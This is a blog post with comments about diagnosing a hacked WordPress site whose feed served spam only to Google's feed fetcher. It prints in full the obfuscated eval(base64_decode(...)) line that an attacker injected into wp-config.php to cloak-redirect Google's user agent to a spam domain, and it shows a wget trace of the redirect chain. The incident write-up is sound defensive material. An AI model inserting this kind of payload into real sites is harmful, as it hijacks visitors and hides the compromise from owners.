This blog appears to have been hacked somehow.
This is my old blog and apart from a test posting the other day, I hadn’t added any new posts since May 2009.
However, when you view this blog’s feed in Google Reader it appears to be full of spammy posts.
The spammy posts don’t show up when viewing the blog’s feed in Firefox (or Safari) RSS readers – it seems to be confined to Google Reader somehow.
I also checked the backend mysql database and the spammy posts are not there so I’m not sure where they are coming from.
I was using the FeedBurner Feedsmith plugin for handling this blog’s feeds but I deactivated that over the weekend when I first became aware of this issue. I thought perhaps the FeedBurner feed may have been hacked so that if I turned it off, any cached spam posts would be cleared out after a day or so, however it seems to not only have persisted but more posts have been added.
Anyone any idea how this is happening and what I can do to stop it?
UPDATE –
With help from Ewan – I discovered that (after looking around at a lot of other files) the wp-config.php file had been edited. The following line had been added
eval(base64_decode('JGFnZW50PSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTtpZihlcmV
naSgiZ29vZ2xlIiwgJGFnZW50KSl7aGVhZGVyKCJIVFRQLzEuMSAzMDEiKTtoZWFkZXIoIkxv
Y2F0aW9uOiBodHRwOi8vYmFibG8ubWUudWsvIik7ZXhpdCgpO30='));
To be safe, I FTP’d in to the server, deleted the wp-config.php file and uploaded a clean one.
The site is now back to working as expected, apologies to anyone who was exposed to the spammy links.
I’ll now go back over the site again with the proverbial fine-toothed comb to see if I can find any other suspicious changes that were made to it.
It looks like you’ve properly been hacked, some kind of SQL injection possibly, or looking at some of your source code, maybe it’s the theme – there’s definitely a couple of oddities in the theme itself.
It looks like you’re already running WP 3.0.1, so there obvious answers are (on order of likelihood):
Someone’s got your admin password via brute-force
Someone’s got a backdoor via a theme or plugin you’re using
Someone’s got a 0-day exploit for wordpress
Realistically, I think someone with technical knowledge of wordpress security is going to need to login to your server and take a look.
Thanks Ewan,
One of the reasons I’m confused though is that I don’t see the spam in the mysql db, nor are they in the posts listing in the WP backend.
They don’t show up when the feed is viewed in most feed readers except Google Reader.
I’ll try going to the default theme to see if that helps.
Just to confirm it, I’ve looked at http://www.tomrafteryit.net/feed/ in Firefox with the default user-agent, then again with the user-agent set to
FeedFetcher-Google; (+http://www.google.com/feedfetcher.html)
Which is the google reader agent. When you view it with the feedfetcher ua, then the spammy posts appear
This is how it’s done, any requests using the feedfetcher UA are given a 301 redirec to bablo.me.uk which in turn redirects to a very spammy feedburner feed. Because feedburner caches your old stuff, it looks like the new things are being injected in place.
So it’s almost certainly a theme or module hack
wget –user-agent=”FeedFetcher-Google; (+http://www.google.com/feedfetcher.html)” http://www.tomrafteryit.net/
–2010-11-23 09:41:03– http://www.tomrafteryit.net/
Resolving http://www.tomrafteryit.net... 91.103.7.50
Connecting to http://www.tomrafteryit.net|91.103.7.50|:80… connected.
HTTP request sent, awaiting response… 301 Moved Permanently
Location: http://bablo.me.uk/ [following]
–2010-11-23 09:41:03– http://bablo.me.uk/
Resolving bablo.me.uk… 78.46.23.47
Connecting to bablo.me.uk|78.46.23.47|:80… connected.
HTTP request sent, awaiting response… 301 Moved Permanently
Location: http://feeds.feedburner.com/ShadowCrushNews [following]
–2010-11-23 09:41:04– http://feeds.feedburner.com/ShadowCrushNews
Resolving feeds.feedburner.com… 74.125.93.118
Connecting to feeds.feedburner.com|74.125.93.118|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: unspecified [text/xml]
Saving to: `ShadowCrushNews’
[
As well as changing the theme, I’ve now also changed the Admin password for the blog.
Ewan – that sounds bizarre to me that just changing the user agent, changes the displayed content, no?
Only working for specific user-agents is typical masking, makes it less obvious for you to spot as the site owner – if you didn’t subscribe to your own blog in google reader, would you of noticed until someone pointed it out to you?
It’s still occuring now with the default theme, so I think it’s either a module or has been inserted into the wordpress code itself (or at the server level, which is much less likely but harder to fix)
Ok,
I’ve deleted the old themes, so the only one left is the current one which ships with WordPress.
Crazy stuff!
Have you disabled all the modules too?
Poking around, it suggests that the hack might be at the apache layer, can you see when your httpd.conf was last modified?
I’ve disabled all the modules now except Akismet.
Honestly I’m not sure how to access the httpd.conf file – I did have a look at the .htaccess and I pulled a couple of lines from that though I’m not sure they were responsible.